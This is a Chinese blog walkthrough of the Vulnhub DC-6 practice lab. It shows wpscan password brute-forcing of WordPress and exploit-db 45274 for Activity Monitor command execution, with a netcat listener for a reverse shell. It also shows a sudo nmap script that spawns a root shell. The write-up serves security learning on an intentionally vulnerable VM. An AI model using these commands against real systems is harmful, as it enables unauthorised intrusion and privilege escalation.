Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机DC6,,,只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
官网地址:https://download.vulnhub.com/dc/DC-6.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。
![在这里插入图片描述](https://img-blog.csdnimg.cn/34a5a4ad456c42628cd977911d229f9f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ced28829308b413384f13edbe536e8b0.png)
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
![在这里插入图片描述](https://img-blog.csdnimg.cn/1f11e694a4734609a3f1ded5e9663cb3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.20
使用命令:nmap -sS -sV -A -n 172.16.5.20
![在这里插入图片描述](https://img-blog.csdnimg.cn/5b3eebcb1e154d9f92758f5346b0b500.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
通过nmap
扫描我们我发现靶机开放了22.80
端口 直接访问80
但是好像没反应 因为之前我们遇到过这种情况 需要改hosts
文件
vim /etc/hosts
打开hosts配置文件,然后重启一下服务 然后就可以正常访问了。
![在这里插入图片描述](https://img-blog.csdnimg.cn/26cda3c4f0484f3a856d8e4bbb4f7f2b.png)
(PS:我改了hosts
但是还是访问不了,最后发现是我代理没关,真的是菜的扣脚,呜呜呜~)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e03a572920014184a339f380514f2999.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
这个界面很熟悉呀,和DC-2一样 估计又是wordpress
使用工具扫一下就知道啦
使用命令:wpscan wordy -e
和dirb 172.16.5.20
发现了wp-cron.php/upload
还有一些用户
![在这里插入图片描述](https://img-blog.csdnimg.cn/a7166a885716480c8a2dafbafb2f7c85.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/874bc273ff404383886bdda0ef4928fe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/fa0a70aa45ca4bbba90c09b37e432ff9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
访问发现并没有什么可以利用的。然后直接访问一下后台,现在只知道账号 不知道密码 所以需要暴力破解。
http://wordy/wp-login.php #访问后台
![在这里插入图片描述](https://img-blog.csdnimg.cn/00471258c2964009b3c8ddee02b09fd9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
然后把五个用户 生成了一个字典 然后又用了之前DC-2 的密码字典 然后用wpscan 爆破了一下发现不行!!!
![在这里插入图片描述](https://img-blog.csdnimg.cn/02520e7ae40b40c5a11c72dca3241039.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
这个时候我们想到了作者给的提示
![在这里插入图片描述](https://img-blog.csdnimg.cn/4afcc591deda456ea6d9caaaa2033caf.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/b32d7b0d154747e29c7b3755818a6250.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic #生成字典
cat wordy-pass1.dic #查看字典
②:暴力破解:
使用命令:wpscan --url wordy -U wordy-user -P wordy-pass1.dic
密码为:helpdesk01
登入网页,登入成功!!!!
![在这里插入图片描述](https://img-blog.csdnimg.cn/91264275da454211927eef262c0b7462.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/c5521599d8a74c8fbcb3a38e42743749.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
③:漏洞发现:
经过大概的阅览知道了权限并不高,而且发现了Activity monitor
这个插件(因为也是第一次做,大概知道了是远程命令执行漏洞)
searchsploit activity monitor #搜索相关信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/5bcde45316c74fe284922018a4a4b4e3.png)
现在我们知道了exp 相关信息了 就要进行利用了
④:漏洞利用:
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html #复制到桌面
vim 45274.html #进行编辑
![在这里插入图片描述](https://img-blog.csdnimg.cn/133cef1f5c2543e5a8b3e4ad6bcfb3f3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
使用python开启个临时服务:python -m SimpleHTTPServer 80
![在这里插入图片描述](https://img-blog.csdnimg.cn/b88caacf1ae144799f0c95f24e4ad64a.png)
使用kali监听一下 nc -nlvp 172.16.5.42 9999
![在这里插入图片描述](https://img-blog.csdnimg.cn/834523d49b1c4b32be79cf2c8811c962.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
(PS:这里我卡了很久,原因是因为设置的时候需要把里面的nc -nlvp
参数去掉 不然运行了也回弹不了shell 还是自己不够仔细,怪自己太菜了,希望大家可以少走弯路~ )
设置交互:python -c "import pty;pty.spawn('/bin/bash')"
![在这里插入图片描述](https://img-blog.csdnimg.cn/b9db2068c7204fc08a264386c07a6cf0.png)
⑤:nmap脚本提权:
在/home/mark/stuff
下发现一个文件,记录了用户graham
的密码GSo7isUM1D4
![在这里插入图片描述](https://img-blog.csdnimg.cn/7a75e178cd15473db274f3a86445c278.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
切换graham
用户 使用命令sudo -l
发现可以直接执行backups.sh
将backups.sh
文件写入/bin/bash
,然后以jens
执行该脚本
执行后切换为jens
用户执行成功发现有nmap
脚本可以执行。
![在这里插入图片描述](https://img-blog.csdnimg.cn/db5a060b142045feb3c7d4f64ab8bfc4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/18b6ac3ec9c04dc0a6ca2b30ea9293ce.png)
进入/tmp
下面 nmap--script
参数可以执行脚本
echo 'os.execute("/bin/bash")'>getroot.sh
sudo nmap --script=getroot.sh
![在这里插入图片描述](https://img-blog.csdnimg.cn/459c1c0361254dfbbe8ffcdc3810e788.png)
⑥:获取flag:
![在这里插入图片描述](https://img-blog.csdnimg.cn/b3674dc47b24406d80a772faa55c8daf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6JC95a-e55qE6a2a5Li2,size_20,color_FFFFFF,t_70,g_se,x_16)
至此看到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这是做的第七个靶场了,学习的知识点和一些细节就是 :
1.要学会多看作者提供的靶机信息 (字典)
2.这次还是老样子 又有新的错误,做好好久 在利用漏洞的时候需要把nc
里面的参数去掉 ,不然不会反弹shell(希望你们可以少走弯路)
新知识点:
①:学会了pyhon
开启临时服务:python -m SimpleHTTPServer 80
②:学会了nmap
脚本执行提权
③:学习了Activity monitor
插件的远程执行漏洞的利用
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!